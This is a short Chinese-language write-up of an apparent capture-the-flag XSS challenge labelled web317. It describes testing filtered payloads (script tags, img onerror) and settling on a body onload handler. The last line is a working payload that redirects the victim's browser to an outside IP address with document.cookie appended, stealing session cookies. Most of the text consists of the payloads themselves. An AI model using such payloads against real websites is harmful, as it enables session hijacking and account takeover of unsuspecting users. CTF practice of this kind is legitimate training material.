解题思路※
题目描述开始过滤
我尝试输入
<script>alert(1);</script>发现无法执行,考虑这个,script被过滤了
然后 尝试使用img标签的onerror来做XSS触发
<img/src=1/onerror=alert(1)/>发现也无法触发
然后采用了body标签的onload
让他加载body的时候执行
<body onload="alert(1)"></body>
发现可以正常的注入,因此采用这个。
<body onload="window.location.href='http://110.42.111.84:36645/?n=web317&c='+document.cookie"></body>
